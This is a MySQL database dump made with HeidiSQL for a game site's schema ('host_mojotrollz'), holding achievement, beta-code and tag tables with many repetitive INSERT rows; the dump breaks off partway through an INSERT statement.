-- -------------------------------------------------------- -- Host: 127.0.0.1 -- Server Version: 5.5.42-1 - (Debian) -- Server Betriebssystem: debian-linux-gnu -- HeidiSQL Version: 9.3.0.4984 -- -------------------------------------------------------- /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET NAMES utf8mb4 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; -- Exportiere Datenbank Struktur für host_mojotrollz CREATE DATABASE IF NOT EXISTS `host_mojotrollz` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `host_mojotrollz`; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_achievement CREATE TABLE IF NOT EXISTS `mojotrollz_achievement` ( `id` int(10) NOT NULL DEFAULT '0', `timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `group` int(10) DEFAULT NULL, `name` tinytext, `txt` tinytext, `ico` tinytext, `counter` int(11) DEFAULT NULL, `stage_1_count` int(11) DEFAULT NULL, `stage_2_count` int(11) DEFAULT NULL, `stage_3_count` int(11) DEFAULT NULL, `stage_4_count` int(11) DEFAULT NULL, `stage_5_count` int(11) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_achievement: ~2 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_achievement` DISABLE KEYS */; INSERT INTO `mojotrollz_achievement` (`id`, `timestamp`, `group`, `name`, `txt`, `ico`, `counter`, `stage_1_count`, `stage_2_count`, `stage_3_count`, `stage_4_count`, `stage_5_count`) VALUES (1, '2014-11-19 20:55:55', 1, 'created account', 'sign up your account on mojotrollz.eu', 'http://www.mojotrollz.eu/web/mojotrollz/api.php?call=files&cat=wowicons&id=default.png', 1, NULL, NULL, NULL, NULL, NULL); INSERT INTO `mojotrollz_achievement` (`id`, `timestamp`, `group`, `name`, `txt`, `ico`, `counter`, `stage_1_count`, `stage_2_count`, `stage_3_count`, `stage_4_count`, `stage_5_count`) VALUES (2, '2014-11-19 21:12:00', 3, 'Killer', 'kill 1 hostile Player', 'http://www.mojotrollz.eu/web/mojotrollz/api.php?call=files&cat=wowicons&id=default.png', 51, 1, 50, 200, 1000, 10000); /*!40000 ALTER TABLE `mojotrollz_achievement` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_beta CREATE TABLE IF NOT EXISTS `mojotrollz_beta` ( `code` char(12) NOT NULL, `user` int(11) NOT NULL, `user_new` int(11) DEFAULT NULL, PRIMARY KEY (`code`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_beta: ~4 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_beta` DISABLE KEYS */; INSERT INTO `mojotrollz_beta` (`code`, `user`, `user_new`) VALUES ('0c37ff1f21c1', 10, 21); INSERT INTO `mojotrollz_beta` (`code`, `user`, `user_new`) VALUES ('4a1a7f5175c0', 10, 30); INSERT INTO `mojotrollz_beta` (`code`, `user`, `user_new`) VALUES ('51d70fcbf88f', 13, 29); INSERT INTO `mojotrollz_beta` (`code`, `user`, `user_new`) VALUES ('8ec75e475558', 11, 28); /*!40000 ALTER TABLE `mojotrollz_beta` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_tags CREATE TABLE IF NOT EXISTS `mojotrollz_tags` ( `id` int(10) NOT NULL DEFAULT '0', `table` int(10) NOT NULL DEFAULT '0', `type` int(10) NOT NULL DEFAULT '0', `value` int(10) DEFAULT NULL, `comment` tinytext, PRIMARY KEY (`table`,`id`,`type`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_tags: ~43.585 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_tags` DISABLE KEYS */; INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1, 1, 2, -1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1, 1, 3, -1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1, 1, 10, -1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (30, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (38, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (40, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (43, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (46, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (46, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (54, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (54, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (66, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (66, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (68, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (68, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (68, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (78, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (78, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (79, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (79, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (95, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (95, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (99, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (99, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (100, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (100, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (115, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (116, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (117, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (118, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (118, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (121, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (122, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (122, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (125, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (126, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (127, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (154, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (190, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (193, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (193, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (196, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (197, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (198, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (199, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (202, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (203, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (203, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (205, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (206, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (206, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (210, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (210, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (212, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (213, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (213, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (215, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (215, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (217, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (218, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (222, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (225, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (225, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (226, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (226, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (227, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (227, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (228, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (232, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (233, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (233, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (234, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (234, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (235, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (235, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (237, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (237, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (238, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (238, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (239, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (239, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (240, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (241, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (244, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (246, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (247, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (248, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (250, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (251, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (252, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (253, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (255, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (257, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (258, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (261, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (263, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (264, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (264, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (265, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (265, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (266, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (267, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (267, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (268, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (269, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (270, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (271, 1, 1, 0, 'generated'); INSERT INTO 